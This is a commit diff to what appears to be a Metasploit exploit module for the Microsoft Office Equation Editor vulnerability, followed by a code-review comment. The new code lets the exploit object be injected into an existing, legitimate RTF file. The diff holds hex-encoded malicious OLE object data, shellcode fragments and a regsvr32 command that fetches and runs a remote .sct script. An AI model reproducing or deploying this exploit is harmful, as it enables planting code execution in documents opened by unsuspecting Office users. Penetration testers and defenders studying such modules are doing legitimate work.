
Commit c788e4e

author
Austin
authored
Update office_ms17_11882.rb
1 parent 7df46b3 commit c788e4e


1 file changed

+104
-77
lines changed


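--- a/modules/exploits/windows/fileformat/office_ms17_11882.rb
+++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb
@@ -46,88 +46,115 @@ def initialize(info = {})
 ))
 
 register_options([
-OptString.new("FILENAME", [true, "Filename to save as", "msf.rtf"])
+OptString.new("FILENAME", [true, "Filename to save as, or inject", "msf.rtf"]),
+OptString.new("FOLDER_PATH", [false, "Path to file to inject", nil])
 ])
 end
 
+def retrieve_header(filename)
+if (not datastore['FOLDER_PATH'].nil?)
+path = "#{datastore['FOLDER_PATH']}/#{datastore['FILENAME']}"
+else
+path = nil
+end
+if (not path.nil?)
+if ::File.file?(path)
+File.open(path, 'rb') do |fd|
+header = fd.read(fd.stat.size).split('{\*\datastore').first
+header = header.to_s # otherwise I get nil class...
+print_status("Injecting #{path}...")
+return header
+end
+else
+header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n"
+header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n"
+header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9'
+end
+else
+header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n"
+header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n"
+header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9'
+end
+return header
+end
+
 
 
 def generate_rtf
-header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n"
-header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n"
-header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata '
-header << '01050000020000000b0000004571756174696f6e2e33000000000000000000000'
-header << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'
-header << '09000600000000000000000000000100000001000000000000000010000002000'
-header << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040'
-header << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0'
-header << '07400720079000000000000000000000000000000000000000000000000000000'
-header << '00000000000000000000000000000000000016000500ffffffffffffffff02000'
-header << '00002ce020000000000c0000000000000460000000000000000000000008020ce'
-header << 'a5613cd30103000000000200000000000001004f006c006500000000000000000'
-header << '00000000000000000000000000000000000000000000000000000000000000000'
-header << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0'
-header << '00000000000000000000000000000000000000000000000000000000000000000'
-header << '000000000000001400000000000000010043006f006d0070004f0062006a00000'
-header << '00000000000000000000000000000000000000000000000000000000000000000'
-header << '0000000000000000000000000000120002010100000003000000ffffffff00000'
-header << '00000000000000000000000000000000000000000000000000000000000000000'
-header << '0001000000660000000000000003004f0062006a0049006e0066006f000000000'
-header << '00000000000000000000000000000000000000000000000000000000000000000'
-header << '00000000000000000000000012000201ffffffff04000000ffffffff000000000'
-header << '00000000000000000000000000000000000000000000000000000000000000003'
-header << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060'
-header << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'ffffff01000002080000000000000000000000000000000000000000000000000'
-header << '00000000000000000000000000000000000000000000000000000000000000000'
-header << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000'
-header << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'
-header << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000'
-header << '00000000000000000000000000000000000000000000000000000000000000000'
-header << "00000300040000000000000000000000000000000000000000000000000000000"
-header << "000000000000000000000000000000000000000000000000000000000000000\n"
+header = retrieve_header(datastore['FILENAME'])
+object_class = '{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata '
+object_class << '01050000020000000b0000004571756174696f6e2e33000000000000000000000'
+object_class << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'
+object_class << '09000600000000000000000000000100000001000000000000000010000002000'
+object_class << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040'
+object_class << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0'
+object_class << '07400720079000000000000000000000000000000000000000000000000000000'
+object_class << '00000000000000000000000000000000000016000500ffffffffffffffff02000'
+object_class << '00002ce020000000000c0000000000000460000000000000000000000008020ce'
+object_class << 'a5613cd30103000000000200000000000001004f006c006500000000000000000'
+object_class << '00000000000000000000000000000000000000000000000000000000000000000'
+object_class << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0'
+object_class << '00000000000000000000000000000000000000000000000000000000000000000'
+object_class << '000000000000001400000000000000010043006f006d0070004f0062006a00000'
+object_class << '00000000000000000000000000000000000000000000000000000000000000000'
+object_class << '0000000000000000000000000000120002010100000003000000ffffffff00000'
+object_class << '00000000000000000000000000000000000000000000000000000000000000000'
+object_class << '0001000000660000000000000003004f0062006a0049006e0066006f000000000'
+object_class << '00000000000000000000000000000000000000000000000000000000000000000'
+object_class << '00000000000000000000000012000201ffffffff04000000ffffffff000000000'
+object_class << '00000000000000000000000000000000000000000000000000000000000000003'
+object_class << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060'
+object_class << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+object_class << 'ffffff01000002080000000000000000000000000000000000000000000000000'
+object_class << '00000000000000000000000000000000000000000000000000000000000000000'
+object_class << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000'
+object_class << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'
+object_class << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000'
+object_class << '00000000000000000000000000000000000000000000000000000000000000000'
+object_class << "00000300040000000000000000000000000000000000000000000000000000000"
+object_class << "000000000000000000000000000000000000000000000000000000000000000\n"
 
 
 shellcode = "\x1c\x00" # 0: 1c 00 sbb al,0x0
@@ -215,7 +242,7 @@ def generate_rtf
 payload += "\x00" * 2
 payload += "regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll"
 payload = (payload + ("\x00" * (197 - payload.length))).unpack('H*').first
-payload = header + payload + footer
+payload = header + object_class + payload + footer
 payload
 end
 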
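Review bot: `retrieve_header(filename)` never reads its `filename` parameter — the path on new line 56 is built from `datastore['FILENAME']` instead — so the signature is misleading and the argument passed on new line 84 is dead. The default RTF preamble is also pasted twice (new lines 69-71 and 74-76), the `.to_s` on new line 64 papers over `split(...).first` returning nil for an empty input file, and a `FOLDER_PATH` whose file does not exist silently falls back to the default header with no message to the operator. Suggest collapsing the nested branches into one guard that actually uses the parameter, builds the path with `::File.join`, reads with `::File.binread`, and emits `print_warning` when the requested file is missing. `generate_rtf`, which consumes this value, starts in the first hunk and ends in the second.

```ruby
def retrieve_header(filename)
  folder = datastore['FOLDER_PATH']
  path = folder ? ::File.join(folder, filename) : nil
  if path && ::File.file?(path)
    print_status("Injecting #{path}...")
    # keep everything before the document's own \datastore group; to_s covers an empty file
    return ::File.binread(path).split('{\*\datastore').first.to_s
  end
  print_warning("#{path} not found, using default RTF header") if path
  header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n"
  header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n"
  header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9'
end
```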